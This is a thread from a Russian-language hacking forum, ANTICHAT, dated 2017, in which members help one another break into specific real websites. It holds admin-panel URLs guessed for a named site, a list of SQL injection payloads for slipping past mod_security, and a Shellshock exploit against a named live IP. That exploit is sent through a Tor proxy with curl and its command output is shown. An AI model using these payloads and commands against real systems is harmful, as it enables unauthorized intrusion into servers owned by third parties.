ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

14.02.2017, 17:45
|
|
Познающий
Регистрация: 24.09.2015
Сообщений: 35
Провел на форуме: 11851
Репутация:
30
|
|
Сообщение от DezMond™
↑
Код:
http://www.biofuelstp.eu/
Помогите админку найти!
Код:
http://www.biofuelstp.eu/mapping/login.php
http://biofuelstp.eu/sqladmin
http://www.biofuelstp.eu/algaetaskforce/atf_home.html
|
|
|

14.02.2017, 20:35
|
|
Новичок
Регистрация: 14.02.2017
Сообщений: 10
Провел на форуме: 3550
Репутация:
0
|
|
|
|
|

15.02.2017, 09:54
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме: 2065
Репутация:
0
|
|
Стандартная ошибка :
.SpoilerTarget" type="button">Spoiler
Not Acceptable
An appropriate representation of the requested resource .......... could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.17 mod_perl/2.0.6 Perl/v5.10.1 Server at www.............. Port 80
mod_security by pass .
|
|
|

15.02.2017, 10:15
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме: 1668307
Репутация:
114
|
|
Сообщение от SaNDER
↑
Стандартная ошибка :
mod_security by pass .
попробуй что-то из следующего:
https://rdot.org/forum/showthread.php?t=3481
либо
Код:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
id=1+uni%0bon+se%0blect+1,2,3--
id=1+UNunionION+SEselectLECT+1,2,3--
id=1+UnIoN/**/SeLecT/**/1,2,3--
id=1+un/**/ion+se/**/lect+1,2,3--
id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
?/%2A%2A/union/%2A%2A/select
1/*!UnIoN*/SeLecT+1,2,3--
id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
|
|
|

15.02.2017, 11:18
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме: 2065
Репутация:
0
|
|
Сообщение от [aywo
"]
[aywo] said:
↑
попробуй что-то из следующего:
https://rdot.org/forum/showthread.php?t=3481
либо
Код:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
id=1+uni%0bon+se%0blect+1,2,3--
id=1+UNunionION+SEselectLECT+1,2,3--
id=1+UnIoN/**/SeLecT/**/1,2,3--
id=1+un/**/ion+se/**/lect+1,2,3--
id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
?/%2A%2A/union/%2A%2A/select
1/*!UnIoN*/SeLecT+1,2,3--
id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
С обходом пробовал всё это . Токо как бы запросы не составлял постоянно типичная ошибка : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
|
|
|

15.02.2017, 11:19
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от qqq1457
↑
отправляю сюда 79.171.115.8:8080//cgi-bin/wlogin методом get в Referer такое: () { Referer; }; echo -e "Content-Type: text/plain\n"; pwd
выполняется код,получаем Bash code injection vulnerability.вопрос: почему не выполняются команды: id,ls,uname ? и т д но
выполняются pwd и help?
акунетикс сильно логи засоряет, советую отказаться от активного пользования этим интсрументом вживую, и еще перехвати запросы акунетикса и посмотри что он отправляет на самом деле
|
|
|

15.02.2017, 12:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от qqq1457
↑
а чем лучше отправлять post,get? да но на другом серве все норм исполняется
в лисе много плагинов которые прекрасно справляются с этими задачами, hackbar к примеру
|
|
|

15.02.2017, 12:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от qqq1457
↑
я про отдельную прогу,ну да ладно,спасибо
проги обычно порождают паразитные запросы как и акунетикс
|
|
|

15.02.2017, 14:57
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от [aywo
"]
[aywo] said:
↑
Потому, что данные команды недоступны для web-сервера из-под юзера, под которым работает web-сервер
доступны, просто есть нюанс
|
|
|

15.02.2017, 15:39
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от [aywo
"]
[aywo] said:
↑
я, если честно, в диком ахуе, во что превратился ачат. Раньше тут не было столько школьников... хотя нынешних троллей даже школьниками не назвать. Помню Белого Жорика банили, за то, что гопника Kez'а троллил, как только мог. Но никто не поспорит,, что Жорик был профи в XSS. Даже большенство современной гринки ему в подметки не сгодятся, он развлекался хеком, и действительно делал это с юмором. Красный дядька+++ думал, что он ферзь йптваюматьнахявсеяинтерне т, ну или пытался таким казаться. А вот Elect, Algol, ettee - реально крутые мужики.
А что здесь происходит сейчас? Script kiddie - это тру хакеры в современном мире
ты написал самый вероятный случай, а я открыл консоль и разобрался, можно конечно злится и писать что вчера трава была зеленее, но выглядит это дешево
и тролей тут без меня хватает
Код:
~$ curl --proxy socks5://127.0.0.1:9150 '79.171.115.8:8080/cgi-bin/wlogin' -H 'Referer: () { Referer; }; echo -e "Content-Type: text/plain\n";echo $(/bin/id)'
uid=1777(meteo) gid=1778(meteo) groups=501(fdp),1778(meteo)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|